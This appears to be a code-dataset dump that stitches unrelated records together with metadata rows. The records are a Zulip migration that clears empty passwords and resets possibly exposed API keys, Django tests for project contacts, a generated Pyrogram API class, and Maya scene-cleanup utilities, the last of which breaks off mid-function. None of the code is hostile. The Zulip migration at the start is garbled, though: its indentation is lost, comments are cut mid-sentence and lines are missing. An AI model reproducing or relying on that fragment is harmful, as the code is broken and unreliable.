from zerver.lib.utils import generate_api_key
def ensure_no_empty_passwords(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
UserProfile = apps.get_model('zerver', 'UserProfile')
RealmAuditLog = apps.get_model('zerver', 'RealmAuditLog')
# series, we've given it migration number 0209, which is a
event_type_class = RealmAuditLog._meta.get_field('event_type').get_internal_type()
if event_type_class == 'CharField':
USER_PASSWORD_CHANGED: Union[int, str] = 'user_password_changed'
USER_API_KEY_CHANGED: Union[int, str] = 'user_api_key_changed'
else:
USER_PASSWORD_CHANGED = 122
USER_API_KEY_CHANGED = 127
# in the loop over all users below.
# Users who changed their password at any time since account
# creation. These users could theoretically have started with an
# empty password, but set a password later via the password reset
# flow. If their API key has changed since they changed their
# password, we can prove their current API key cannot have been
# exposed; we store those users in
# password_change_user_ids_no_reset_needed.
password_change_user_ids = set(RealmAuditLog.objects.filter(
event_type=USER_PASSWORD_CHANGED).values_list("modified_user_id", flat=True))
password_change_user_ids_api_key_reset_needed: Set[int] = set()
password_change_user_ids_no_reset_needed: Set[int] = set()
for user_id in password_change_user_ids:
# Here, we check the timing for users who have changed
# their password.
# We check if the user changed their API key since their first password change.
query = RealmAuditLog.objects.filter(
modified_user=user_id, event_type__in=[USER_PASSWORD_CHANGED,
USER_API_KEY_CHANGED]
).order_by("event_time")
earliest_password_change = query.filter(event_type=USER_PASSWORD_CHANGED).first()
# Since these users are in password_change_user_ids, this must not be None.
assert earliest_password_change is not None
latest_api_key_change = query.filter(event_type=USER_API_KEY_CHANGED).last()
if latest_api_key_change is None:
# This user has never changed their API key. As a
# result, even though it's very likely this user never
# original hash, so we can't prove the user's API key
# was never affected. We schedule this user's API key
password_change_user_ids_api_key_reset_needed.add(user_id)
elif earliest_password_change.event_time <= latest_api_key_change.event_time:
password_change_user_ids_no_reset_needed.add(user_id)
else:
password_change_user_ids_api_key_reset_needed.add(user_id)
if password_change_user_ids_no_reset_needed and settings.PRODUCTION:
# to reset their API key, but because they've changed their
# buggy password.
#
# In theory, this list can be recalculated using the above
# algorithm modified to only look at events before the time
# this migration was installed, but it's helpful to log it as well.
with open("/var/log/zulip/0209_password_migration.log", "w") as log_file:
line = "No reset needed, but changed password: {}\n"
log_file.write(line.format(password_change_user_ids_no_reset_needed))
AFFECTED_USER_TYPE_EMPTY_PASSWORD = 'empty_password'
AFFECTED_USER_TYPE_CHANGED_PASSWORD = 'changed_password'
MIGRATION_ID = '0209_user_profile_no_empty_password'
def write_realm_audit_log_entry(user_profile: Any,
event_time: Any, event_type: Any,
affected_user_type: str) -> None:
RealmAuditLog.objects.create(
realm=user_profile.realm,
modified_user=user_profile,
event_type=event_type,
event_time=event_time,
extra_data=ujson.dumps({
'migration_id': MIGRATION_ID,
'affected_user_type': affected_user_type,
})
)
# the server level, then we plan to skip resetting any users' API
email_auth_enabled = 'zproject.backends.EmailAuthBackend' in settings.AUTHENTICATION_BACKENDS
# and e.g. a server admin could manually edit the database to
# change a bot into a human user if they really wanted to. And
# there's essentially no harm in rewriting state for a deactivated
for user_profile in UserProfile.objects.all():
event_time = timezone_now()
if check_password('', user_profile.password):
user_profile.password = make_password(None)
update_fields = ["password"]
write_realm_audit_log_entry(user_profile, event_time,
USER_PASSWORD_CHANGED,
AFFECTED_USER_TYPE_EMPTY_PASSWORD)
if email_auth_enabled and not user_profile.is_bot:
reset_user_api_key(user_profile)
update_fields.append("api_key")
event_time = timezone_now()
write_realm_audit_log_entry(user_profile, event_time,
USER_API_KEY_CHANGED,
AFFECTED_USER_TYPE_EMPTY_PASSWORD)
user_profile.save(update_fields=update_fields)
continue
elif email_auth_enabled and \
user_profile.id in password_change_user_ids_api_key_reset_needed:
reset_user_api_key(user_profile)
user_profile.save(update_fields=["api_key"])
write_realm_audit_log_entry(user_profile, event_time,
USER_API_KEY_CHANGED,
AFFECTED_USER_TYPE_CHANGED_PASSWORD)
def reset_user_api_key(user_profile: Any) -> None:
old_api_key = user_profile.api_key
user_profile.api_key = generate_api_key()
cache_delete(user_profile_by_api_key_cache_key(old_api_key))
event = {'type': 'clear_push_device_tokens',
'user_profile_id': user_profile.id}
queue_json_publish("deferred_work", event)
class Migration(migrations.Migration):
atomic = False
dependencies = [
('zerver', '0208_add_realm_night_logo_fields'),
]
operations = [
migrations.RunPython(ensure_no_empty_passwords,
reverse_code=migrations.RunPython.noop),
]
| true
| true
|
790c860c3dff2bab32c7d3d6ac54f79baebccdb6
| 2,840
|
py
|
Python
|
systori/apps/directory/test_models.py
|
systori/systori
|
e309c63e735079ff6032fdaf1db354ec872b28b1
|
[
"BSD-3-Clause"
] | 12
|
2018-01-30T00:44:06.000Z
|
2020-07-13T05:20:48.000Z
|
systori/apps/directory/test_models.py
|
systori/systori
|
e309c63e735079ff6032fdaf1db354ec872b28b1
|
[
"BSD-3-Clause"
] | 36
|
2018-03-06T17:49:50.000Z
|
2020-06-23T19:26:00.000Z
|
systori/apps/directory/test_models.py
|
systori/systori
|
e309c63e735079ff6032fdaf1db354ec872b28b1
|
[
"BSD-3-Clause"
] | 3
|
2018-08-03T07:03:09.000Z
|
2020-07-09T20:21:10.000Z
|
from django.test import TestCase
from ..company.models import Company
from ..project.models import *
from .models import *
def create_contact_data(self):
self.company = Company.objects.create(schema="test", name="Test")
self.company.activate()
self.project = Project.objects.create(name="my project")
self.contact = Contact.objects.create(first_name="Ludwig", last_name="von Mises")
class ContactProjectTests(TestCase):
def setUp(self):
create_contact_data(self)
def test_no_association(self):
self.assertEquals(0, len(self.contact.projects.all()))
self.assertEquals(0, len(self.contact.project_contacts.all()))
self.assertEquals(0, len(self.project.contacts.all()))
self.assertEquals(0, len(self.project.project_contacts.all()))
def test_customer_association(self):
ProjectContact.objects.create(
project=self.project,
contact=self.contact,
association=ProjectContact.CUSTOMER,
)
self.assertEquals(1, len(self.contact.projects.all()))
self.assertEquals(1, len(self.project.contacts.all()))
pc = ProjectContact.objects.get(project=self.project)
self.assertEquals(ProjectContact.CUSTOMER, pc.association)
class BillableContactTests(TestCase):
def setUp(self):
self.company = Company.objects.create(schema="test", name="Test")
self.company.activate()
self.project = Project.objects.create(name="my project")
self.pc1 = ProjectContact.objects.create(
project=self.project,
contact=Contact.objects.create(first_name="A 1", last_name="B 1"),
)
self.pc2 = ProjectContact.objects.create(
project=self.project,
contact=Contact.objects.create(first_name="A 2", last_name="B 2"),
)
def test_no_billable_set(self):
self.assertEqual(
0, self.project.project_contacts.filter(is_billable=True).count()
)
def test_billable_set(self):
self.pc1.is_billable = True
self.pc1.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
def test_only_one_contact_can_be_billable(self):
self.pc1.is_billable = True
self.pc1.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
self.assertEqual(
self.pc1, self.project.project_contacts.filter(is_billable=True).get()
)
self.pc2.is_billable = True
self.pc2.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
self.assertEqual(
self.pc2, self.project.project_contacts.filter(is_billable=True).get()
)
| 35.5
| 85
| 0.65493
|
from django.test import TestCase
from ..company.models import Company
from ..project.models import *
from .models import *
def create_contact_data(self):
self.company = Company.objects.create(schema="test", name="Test")
self.company.activate()
self.project = Project.objects.create(name="my project")
self.contact = Contact.objects.create(first_name="Ludwig", last_name="von Mises")
class ContactProjectTests(TestCase):
def setUp(self):
create_contact_data(self)
def test_no_association(self):
self.assertEquals(0, len(self.contact.projects.all()))
self.assertEquals(0, len(self.contact.project_contacts.all()))
self.assertEquals(0, len(self.project.contacts.all()))
self.assertEquals(0, len(self.project.project_contacts.all()))
def test_customer_association(self):
ProjectContact.objects.create(
project=self.project,
contact=self.contact,
association=ProjectContact.CUSTOMER,
)
self.assertEquals(1, len(self.contact.projects.all()))
self.assertEquals(1, len(self.project.contacts.all()))
pc = ProjectContact.objects.get(project=self.project)
self.assertEquals(ProjectContact.CUSTOMER, pc.association)
class BillableContactTests(TestCase):
def setUp(self):
self.company = Company.objects.create(schema="test", name="Test")
self.company.activate()
self.project = Project.objects.create(name="my project")
self.pc1 = ProjectContact.objects.create(
project=self.project,
contact=Contact.objects.create(first_name="A 1", last_name="B 1"),
)
self.pc2 = ProjectContact.objects.create(
project=self.project,
contact=Contact.objects.create(first_name="A 2", last_name="B 2"),
)
def test_no_billable_set(self):
self.assertEqual(
0, self.project.project_contacts.filter(is_billable=True).count()
)
def test_billable_set(self):
self.pc1.is_billable = True
self.pc1.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
def test_only_one_contact_can_be_billable(self):
self.pc1.is_billable = True
self.pc1.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
self.assertEqual(
self.pc1, self.project.project_contacts.filter(is_billable=True).get()
)
self.pc2.is_billable = True
self.pc2.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
self.assertEqual(
self.pc2, self.project.project_contacts.filter(is_billable=True).get()
)
| true
| true
|
790c876c497a26028208d38a1aa0636aa1e15800
| 2,020
|
py
|
Python
|
venv/Lib/site-packages/pyrogram/raw/functions/messages/get_dialog_unread_marks.py
|
iamgeorgiy/heroku-userbot
|
5a92417d16f8ead949d88cb38da213fc2da5d3a4
|
[
"Apache-2.0"
] | null | null | null |
venv/Lib/site-packages/pyrogram/raw/functions/messages/get_dialog_unread_marks.py
|
iamgeorgiy/heroku-userbot
|
5a92417d16f8ead949d88cb38da213fc2da5d3a4
|
[
"Apache-2.0"
] | null | null | null |
venv/Lib/site-packages/pyrogram/raw/functions/messages/get_dialog_unread_marks.py
|
iamgeorgiy/heroku-userbot
|
5a92417d16f8ead949d88cb38da213fc2da5d3a4
|
[
"Apache-2.0"
] | null | null | null |
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2020 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class GetDialogUnreadMarks(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``117``
- ID: ``0x22e24e22``
**No parameters required.**
Returns:
List of :obj:`DialogPeer <pyrogram.raw.base.DialogPeer>`
"""
__slots__: List[str] = []
ID = 0x22e24e22
QUALNAME = "functions.messages.GetDialogUnreadMarks"
def __init__(self) -> None:
pass
@staticmethod
def read(data: BytesIO, *args: Any) -> "GetDialogUnreadMarks":
# No flags
return GetDialogUnreadMarks()
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
# No flags
return data.getvalue()
| 30.149254
| 103
| 0.631188
|
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
| true
| true
|
790c87d6ab5b6406edbaf5b2a2fb86acf561e471
| 24,973
|
py
|
Python
|
utils/cleanup.py
|
fsanges/glTools
|
8ff0899de43784a18bd4543285655e68e28fb5e5
|
[
"MIT"
] | 165
|
2015-01-26T05:22:04.000Z
|
2022-03-22T02:50:41.000Z
|
utils/cleanup.py
|
qeeji/glTools
|
8ff0899de43784a18bd4543285655e68e28fb5e5
|
[
"MIT"
] | 5
|
2015-12-02T02:39:44.000Z
|
2020-12-09T02:45:54.000Z
|
utils/cleanup.py
|
qeeji/glTools
|
8ff0899de43784a18bd4543285655e68e28fb5e5
|
[
"MIT"
] | 83
|
2015-02-10T17:18:24.000Z
|
2022-02-10T07:16:47.000Z
|
import maya.mel as mm
import maya.cmds as mc
import glTools.utils.attribute
import glTools.utils.base
import glTools.utils.layer
import glTools.utils.reference
import glTools.utils.shader
import glTools.utils.shape
import glTools.utils.transform
import re
# ===========
# - Cleanup -
# ===========
def toggleCons(state):
'''
Toggle the display state of all joint buffers ('Con') in the scene
@param state: The display state to set the joint buffers to
@type state: bool
'''
# Get List of Con Joints
conList = mc.ls('*Con*_jnt',type='joint')
for conJnt in conList:
# Toggle State
if state:
glTools.utils.base.displayOverride(conJnt,overrideEnable=1,overrideLOD=0)
mc.setAttr(conJnt+'.drawStyle',0) # Bone
else:
glTools.utils.base.displayOverride(conJnt,overrideEnable=1,overrideLOD=1)
mc.setAttr(conJnt+'.drawStyle',2) # None
# Set Joint Radius
if mc.getAttr(conJnt+'.radius',se=True):
mc.setAttr(conJnt+'.radius',0.0)
mc.setAttr(conJnt+'.radius',cb=False)
# Hide Rotate Order
if mc.getAttr(conJnt+'.ro',se=True):
mc.setAttr(conJnt+'.ro',cb=False)
# Return Result
return conList
def toggleEnds(state):
'''
Toggle the display state of all joint buffers ('Con') in the scene
@param state: The display state to set the joint buffers to
@type state: bool
'''
# Get list of End joints
endList = mc.ls('*End_jnt',type='joint')
for endJnt in endList:
# Toggle state
if state:
glTools.utils.base.displayOverride(endJnt,overrideEnable=1,overrideLOD=0)
mc.setAttr(endJnt+'.drawStyle',0) # Bone
else:
glTools.utils.base.displayOverride(endJnt,overrideEnable=1,overrideLOD=1)
mc.setAttr(endJnt+'.drawStyle',2) # None
# Set Joint Radius
if mc.getAttr(endJnt+'.radius',se=True):
mc.setAttr(endJnt+'.radius',0.0)
mc.setAttr(endJnt+'.radius',cb=False)
# Hide Rotate Order
if mc.getAttr(endJnt+'.ro',se=True):
mc.setAttr(endJnt+'.ro',cb=False)
# Return Result
return endList
def disableDrawingOverrides(grp):
'''
Disable drawing overrides for all DAG descendents of the specified transform node.
@param state: The transform under which all descendent node drawing overrides will be disabled.
@type state: bool
'''
# ==========
# - Checks -
# ==========
if not mc.objExists(grp):
raise Exception('Transform "'+grp+'" does not exists!')
if not glTools.utils.transform.isTransform(grp):
raise Exception('Object "'+grp+'" is not a valid transform!')
# Get Descendent Node List
nodeList = mc.ls(mc.listRelatives(grp,ad=True, pa=True) or [],dag=True) or []
if not nodeList: return []
# =============================
# - Disable Drawing Overrides -
# =============================
overrideName = 'overrideEnabled'
for node in nodeList:
# Check Override Attribute
overrideAttr = node+'.'+overrideName
if not mc.attributeQuery(overrideName,n=node,ex=True):
print('Override attribute "'+overrideAttr+'" does not exist! Skipping...')
continue
# Check Override Attribute Connections
overrideConn = mc.listConnections(overrideAttr,s=True,d=False) or []
if overrideConn:
print('Found incoming connection for override attribute "'+overrideAttr+'"! ('+overrideConn[0]+')')
print('Disconnecting attribute and disabling drawing overrides...')
mc.disconnectAttr(overrideConn[0],overrideAttr)
# Disable Drawing Overrides
try: mc.setAttr(overrideAttr,0)
except: pass
# =================
# - Return Result -
# =================
return nodeList
# ==========
# - Checks -
# ==========
def uniqueNameCheck(objList=[],transformsOnly=False):
'''
Return a list of nodes with non unique names
@param objList: List of scene objects to check. If empty, use all existing scene nodes.
@type objList: list
@param transformsOnly: Check transform names only
@type transformsOnly: bool
'''
# Get list of scene nodes
if not objList:
objList = mc.ls()
if transformsOnly:
nodeList = mc.ls(objList,transforms=True)
else:
nodeList = mc.ls(objList,dag=True)
# Determine non unique names
nonUniqueList = [i for i in nodeList if i.count('|')]
# Return result
return nonUniqueList
def validNameCheck(objList=[]):
'''
Check for valid names in the specified list of nodes
@param objList: List of objects to check valid names for. If empty use all scene transforms
@type objList: list
'''
# Check geo list
if not objList: objList = mc.ls()
if not objList: return []
# Remove Default Nodes
defNodes = ['dof1','time1','lambert1','postProcessList1','sequenceManager1','lightLinker1','renderGlobalsList1','dynController1','lightList1','particleCloud1','shaderGlow1']
objList = [obj for obj in objList if not defNodes.count(obj)]
objList = [obj for obj in objList if not obj.startswith('default')]
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectTypeFilter']
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectNameFilter']
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectScriptFilter']
# Check valid names
result = []
for obj in objList:
# Check prefix
#if not obj.startswith('cn_') and not obj.startswith('lf_') and not obj.startswith('rt_'):
# result.append(obj)
# Check "pasted"
if obj.count('pasted'): result.append(obj)
# Check "poly"
if obj.count('poly'): result.append(obj)
# Check double underscore "__"
if obj.count('__'): result.append(obj)
# Check names ending with a digit (0-9)
digitSearch = re.search('(\d+)$', obj)
if digitSearch and glTools.utils.transform.isTransform(obj):
if digitSearch.group(0):
result.append(obj)
# Remove Duplicate Entries
result = list(set(result))
# Return result
return result
def shapeNameCheck( objList = [],
typeList = ['mesh','nurbsCurve','nurbsSurface'],
skipIntermediates = True,
skipMultipleShapes = False,
strict = True ):
'''
Return a list of incorrectly named geometry shape nodes.
@param objList: List of objects to check for valid shape names. If empty, get all nodes of the specified type.
@type objList: list
@param typeList: List of shape types to check for valid names.
@type typeList: list
@param skipIntermediates: Skip intermediate shapes.
@type skipIntermediates: bool
@param skipMultipleShapes: Skip objects with multiple shape nodes.
@type skipMultipleShapes: bool
@param strict: Shape name must match parent+"Shape" to pass.
@type strict: bool
'''
# ==========
# - Checks -
# ==========
if not objList: objList = mc.ls(type=typeList)
# ====================
# - Build Shape List -
# ====================
shapeList = []
for obj in objList:
# Get Shapes from Transform
if glTools.utils.transform.isTransform(obj):
# Check Multiple Shapes
objShapes = mc.listRelatives(obj,s=True,pa=True)
if not objShapes: continue
if (len(objShapes) > 1) and skipMultipleShapes: continue
# Get Shapes
tShapeList = mc.listRelatives(obj,s=True,ni=skipIntermediates,pa=True)
for shape in tShapeList:
shapeList.append(obj)
elif glTools.utils.shape.isShape(obj):
shapeList.append(obj)
else:
print('Unable to determine shape from object "'+obj+'"! Skipping...')
# =====================
# - Check Shape Names -
# =====================
invalidShapeNameList = []
for shape in shapeList:
# Check Type
if not typeList.count(mc.objectType(shape)): continue
# Check Intermediate Object
if skipIntermediates and mc.getAttr(shape+'.intermediateObject'): continue
# Get transform parent name
parent = mc.listRelatives(shape,p=True,pa=True)[0]
# Get Short Names
shapeSN = mc.ls(shape,sn=True)[0]
parentSN = mc.ls(parent,sn=True)[0]
# Check Shape Name
if strict and (shape != parent+'Shape'):
invalidShapeNameList.append(shape)
if not shapeSN.startswith(parentSN):
invalidShapeNameList.append(shape)
elif not shapeSN.count('Shape'):
invalidShapeNameList.append(shape)
# =================
# - Return Result -
# =================
return invalidShapeNameList
def intermediateShapesCheck(objList=[]):
'''
Return a list of intermediate shapes.
@param objList: List of objects to check for intermediate shapes.
@type objList: list
'''
# Check nodeList
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,transforms=True)
# For each node
result = []
for obj in objList:
# Get All Shapes
shapes = mc.listRelatives(obj,s=True,pa=True)
if not shapes: shapes = []
for shape in shapes:
# Check Intermediate Shapes
if mc.objExists(shape+'.intermediateObject'):
if mc.getAttr(shape+'.intermediateObject'):
result.append(shape)
# Return Result
return result
def multipleShapeCheck(objList=[]):
'''
Return a list of transforms with multiple shape nodes
@param objList: List of objects to check for multiple shapes.
@type objList: list
'''
# Get scene transforms
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,dag=True)
# Iterate over scene transforms
result = []
for transform in objList:
# Check Transform
if not glTools.utils.transform.isTransform(transform):
transform = mc.listRelatives(transform,p=True)[0]
# Get transform shape list
shapeList = mc.listRelatives(transform,s=True)
# Check shape list
if not shapeList: continue
shapeList = mc.ls(shapeList,type=['mesh','nurbsSurface','nurbsCurve'])
# Check number of shapes
if len(shapeList) > 1: result.append(transform)
# Return result
return result
def constructionHistoryCheck(geoList=[]):
    '''
    Return a list of transforms whose geometry carries construction history.
    @param geoList: List of objects to check for construction history. If empty, check all scene geometry.
    @type geoList: list
    '''
    # Get geometry shapes to check
    if not geoList:
        geoList = mc.ls(geometry=True)
    else:
        geoList = mc.listRelatives(geoList, s=True, pa=True) or []
    result = []
    for geo in geoList:
        # FIX: mc.listHistory() can return None; guard before list operations
        hist = mc.listHistory(geo) or []
        # Remove the shape itself from its own history
        if hist.count(geo):
            hist.remove(geo)
        # Ignore node types that do not represent real construction history
        ignore = mc.ls(hist, type=['groupId', 'shadingEngine', 'transform'])
        hist = list(set(hist) - set(ignore))
        if hist:
            result.extend(mc.listRelatives(geo, p=True, pa=True) or [])
    # Remove duplicate names
    if result:
        result = list(set(result))
    return result
def userAttrCheck(objList=[], includeShapes=False):
    '''
    Return a list of user defined attributes for a specified list of nodes (and shapes).
    @param objList: List of objects to check for user defined attributes. If empty, check all nodes.
    @type objList: list
    @param includeShapes: Also check shapes for user defined attributes.
    @type includeShapes: bool
    '''
    if not objList:
        objList = mc.ls()
    result = []
    for node in objList:
        # Node-level user attributes
        for attr in (mc.listAttr(node, ud=True) or []):
            result.append(node + '.' + attr)
        # Optionally include shape-level user attributes
        if includeShapes:
            for shape in (mc.listRelatives(node, s=True) or []):
                for attr in (mc.listAttr(shape, ud=True) or []):
                    result.append(shape + '.' + attr)
    return result
def emptyGroupCheck(objList=[]):
    '''
    List empty groups.
    @param objList: List of transforms to check. If empty, check all scene transforms.
    @type objList: list
    '''
    groups = mc.ls(objList, transforms=True) if objList else mc.ls(transforms=True)
    # A group is empty when it has no descendants at all
    return [grp for grp in groups if not mc.listRelatives(grp, ad=True)]
def emptySetCheck(setList=[]):
    '''
    Return a list of empty sets.
    @param setList: List of sets to check. If empty, check all scene sets.
    @type setList: list
    '''
    if not setList:
        setList = mc.ls(sets=True)
    result = []
    for setName in setList:
        # Skip anything that is not actually a set
        if not mc.ls(setName, sets=True):
            continue
        # Skip Maya's built-in default/initial sets
        if setName.startswith('default') or setName.startswith('initial'):
            continue
        # Empty membership query means the set is empty
        if not mc.sets(setName, q=True):
            result.append(setName)
    return result
def emptyLayerCheck(layerList=[]):
    '''
    Return a list of empty layers.
    @param layerList: List of layers to check. If empty, use all existing layers in current scene.
    @type layerList: list
    '''
    layerTypes = ['displayLayer', 'renderLayer', 'animLayer']
    layers = mc.ls(layerList, type=layerTypes) if layerList else mc.ls(type=layerTypes)
    result = []
    for layer in layers:
        # Skip anything that is not actually a layer
        if not mc.ls(layer, type=layerTypes):
            continue
        # Skip Maya's built-in default layers
        if layer.startswith('default'):
            continue
        # No members means the layer is empty
        if not glTools.utils.layer.memberList(layer):
            result.append(layer)
    return result
def animCurveCheck(curveTypeList=['animCurveTL','animCurveTA','animCurveTT','animCurveTU','animCurveUL','animCurveUA','animCurveUT','animCurveUU']):
    '''
    Return a list of all existing animCurves of the specified types.
    @param curveTypeList: List of animCurve node types to consider.
    @type curveTypeList: list
    '''
    animCurves = []
    for curveType in curveTypeList:
        # mc.ls() may return None for a type with no instances
        animCurves.extend(mc.ls(type=curveType) or [])
    return animCurves
def unusedShadingNodeCheck():
    '''
    Return a list of unused shading nodes.
    '''
    unusedNodes = glTools.utils.shader.listUnusedShadingNodes()
    return unusedNodes
def noGeometryShaderCheck(geoList=[]):
    '''
    Return a list of non intermediate geometry shapes with no shader assignment.
    @param geoList: List of geometry to check for shader assignments. If empty, check all scene geometry.
    @type geoList: list
    '''
    geoTypes = ['mesh', 'nurbsSurface']
    if not geoList:
        geoList = mc.ls(type=geoTypes, ni=True)
    else:
        # Include descendant shapes of the given objects, then filter to geometry
        geoList += mc.ls(mc.listRelatives(geoList, ad=True, pa=True) or [], type=geoTypes, ni=True) or []
        geoList = mc.ls(geoList, type=geoTypes, ni=True)
    # A shape with no shading group connection has no shader assigned
    return [geo for geo in geoList if not glTools.utils.shader.getSG(geo)]
def unusedReferenceCheck():
    '''
    Return a list of unused reference nodes.
    '''
    result = []
    for ref in glTools.utils.reference.listReferences():
        # A reference node with no resolvable file is considered unused.
        # FIX: catch Exception instead of a bare except so system-exiting
        # exceptions (KeyboardInterrupt, SystemExit) are not swallowed.
        try:
            glTools.utils.reference.getReferenceFile(ref)
        except Exception:
            result.append(ref)
    return result
def unknownNodeCheck():
    '''
    Return a list of unknown nodes.
    '''
    # mc.ls() may return None; normalize to an empty list in one expression
    return mc.ls(type='unknown') or []
def checkTransforms(objList=[], tol=0.0000000001):
    '''
    Check for non-zero transforms.
    @param objList: List of transforms to check. If empty, check all scene transforms.
    @type objList: list
    @param tol: Value tolerance.
    @type tol: float
    '''
    if not objList:
        objList = mc.ls(transforms=True)
    if not objList:
        return []
    # Attribute/rest-value pairs: translate and rotate rest at 0.0, scale at 1.0
    attrRest = [
        ('tx', 0.0), ('ty', 0.0), ('tz', 0.0),
        ('rx', 0.0), ('ry', 0.0), ('rz', 0.0),
        ('sx', 1.0), ('sy', 1.0), ('sz', 1.0),
    ]
    defaultCams = ('persp', 'front', 'side', 'top')
    transformList = []
    for obj in objList:
        # Skip Maya's default cameras
        if obj in defaultCams:
            continue
        for attr, rest in attrRest:
            if abs(mc.getAttr(obj + '.' + attr) - rest) > tol:
                transformList.append(obj)
                break
    return transformList
def displayOverridesCheck(objList=[]):
    '''
    Check all/specified objects for display overrides.
    @param objList: List of DAG nodes to check. If empty, use all DAG nodes in scene.
    @type objList: list
    '''
    nodes = mc.ls(objList, dag=True) if objList else mc.ls(dag=True)
    # Report any node whose drawing override is enabled
    return [node for node in nodes if mc.getAttr(node + '.overrideEnabled')]
# =========
# - Fixes -
# =========
def shapeNameFix(shape):
    '''
    Fix an incorrectly named geometry shape node by renaming it after its transform parent.
    @param shape: Shape node to rename.
    @type shape: str
    '''
    parent = mc.listRelatives(shape, p=True)[0]
    shapeName = parent + 'Shape'
    # Refuse to clobber an existing node of the target name
    if mc.objExists(shapeName):
        raise Exception('Shape "'+shapeName+'" already exists! Unable to rename shape "'+shape+'"!')
    return mc.rename(shape, shapeName)
def deleteIntermediateShapes(objList=[]):
    '''
    Delete all intermediate shapes in the scene (or under the given objects).
    @param objList: List of objects to clean. If empty, process the whole scene.
    @type objList: list
    '''
    intermediates = intermediateShapesCheck(objList)
    if intermediates:
        mc.delete(intermediates)
    return intermediates
def deleteConstructionHistory(geoList=[]):
    '''
    Delete construction history for specified geometry.
    @param geoList: List of objects to delete construction history from. If empty, process all scene geometry.
    @type geoList: list
    '''
    if not geoList:
        geoList = mc.ls(geometry=True)
    for geo in geoList:
        mc.delete(geo, ch=True)
    return geoList
def deleteUserAttrs(nodeList=[], includeShapes=False):
    '''
    Delete user defined attributes from the specified list of nodes.
    @param nodeList: List of nodes to delete user defined attrs from. If empty, assume all nodes.
    @type nodeList: list
    @param includeShapes: Also delete user defined attributes from shapes.
    @type includeShapes: bool
    '''
    if not nodeList:
        nodeList = mc.ls()
    for node in nodeList:
        glTools.utils.attribute.deleteUserAttrs(node)
        if includeShapes:
            # FIX: mc.listRelatives() returns None when a node has no shapes;
            # guard with "or []" so shape-less nodes no longer raise a TypeError.
            for shape in (mc.listRelatives(node, s=True) or []):
                glTools.utils.attribute.deleteUserAttrs(shape)
def deleteEmptyGroups(objList=[]):
    '''
    Delete empty groups.
    @param objList: List of transforms to consider. If empty, process the whole scene.
    @type objList: list
    '''
    emptyGroups = emptyGroupCheck(objList=objList)
    if emptyGroups:
        mc.delete(emptyGroups)
    return emptyGroups
def deleteEmptySets(setList=[]):
    '''
    Delete empty object sets.
    NOTE(review): this function is redefined later in this module; the later
    definition shadows this one at import time — confirm which is intended.
    @param setList: List of sets to consider. If empty, process all scene sets.
    @type setList: list
    '''
    emptySets = emptySetCheck(setList=setList)
    if emptySets:
        mc.delete(emptySets)
    return emptySets
def deleteEmptyLayers(layerList=[]):
    '''
    Delete empty layers.
    @param layerList: List of layers to consider. If empty, process all scene layers.
    @type layerList: list
    '''
    emptyLayers = emptyLayerCheck(layerList=layerList)
    if emptyLayers:
        mc.delete(emptyLayers)
    return emptyLayers
def deleteUnknownNodes():
    '''
    Delete all nodes of type "unknown" in the scene.
    '''
    unknownNodes = unknownNodeCheck() or []
    for node in unknownNodes:
        # Unknown nodes are frequently locked; unlock before deleting
        try:
            mc.lockNode(node, l=False)
            mc.delete(node)
        except:
            print('Problem deleting unknown node "'+node+'"!')
    return unknownNodes
def deleteNodesByType(nodeTypeList=[]):
    '''
    Delete nodes of the specified type(s).
    @param nodeTypeList: List of node types to delete.
    @type nodeTypeList: list
    '''
    if not nodeTypeList:
        return []
    # mc.ls() may return None when no nodes match
    nodeList = mc.ls(type=nodeTypeList) or []
    if nodeList:
        mc.delete(nodeList)
    return nodeList
def deleteUnusedReferenceNodes():
    '''
    Delete all unused reference nodes in the scene via Maya's builtin MEL command.
    '''
    mm.eval('RNdeleteUnused')
def deleteEmptySets(setList=[]):
    '''
    Delete empty object sets.
    @param setList: A list of sets to check. If empty, check all sets in current scene.
    @type setList: list
    '''
    if not setList:
        setList = mc.ls(sets=True)
    # FIX: loop variable renamed so it no longer shadows the builtin set()
    emptySetList = [objSet for objSet in setList if not mc.sets(objSet, q=True)]
    for emptySet in emptySetList:
        # Best-effort delete: some sets (e.g. locked/default) may refuse deletion
        # FIX: narrowed bare except to Exception so Ctrl-C is not swallowed
        try:
            mc.delete(emptySet)
        except Exception:
            pass
    return emptySetList
def deleteAllSets(excludeList=[]):
    '''
    Delete all object sets, optionally excluding some.
    @param excludeList: A list of sets to exclude from deletion.
    @type excludeList: list
    '''
    setList = mc.ls(sets=True)
    if excludeList:
        excluded = mc.ls(excludeList, sets=True)
